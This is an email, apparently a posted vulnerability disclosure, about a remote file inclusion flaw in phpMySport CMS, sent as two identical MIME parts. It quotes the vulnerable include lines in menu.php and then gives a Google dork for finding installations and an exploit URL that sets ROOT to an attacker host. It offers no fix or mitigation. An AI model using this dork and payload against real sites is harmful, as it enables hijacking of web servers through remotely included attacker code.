------=_Part_13450_9048419.1173540747323
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Application : phpMySport CMS
URL : http://phpmysport.sourceforge.net/en/
Variable menu.php
include_once(ROOT."/team/sql_team.php");
include_once(ROOT."/team/tpl_team.php");
include_once(ROOT."/team/lg_team_".LANG.".php");
include(ROOT."/team/team_list.php");
Exploit:
~~~~~~~~
dork: "phpMySport"
http://www.vuln.com/path/menu.php?ROOT=http://evilhost
vitux
#vitux.manis@gmail.com
------=_Part_13450_9048419.1173540747323
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Application : phpMySport CMS
URL : http://phpmysport.sourceforge.net/en/
Variable menu.php
include_once(ROOT."/team/sql_team.php");
include_once(ROOT."/team/tpl_team.php");
include_once(ROOT."/team/lg_team_".LANG.".php");
include(ROOT."/team/team_list.php");
Exploit:
~~~~~~~~
dork: "phpMySport"
http://www.vuln.com/path/menu.php?ROOT=http://evilhost
vitux
#vitux.manis@gmail.com
------=_Part_13450_9048419.1173540747323--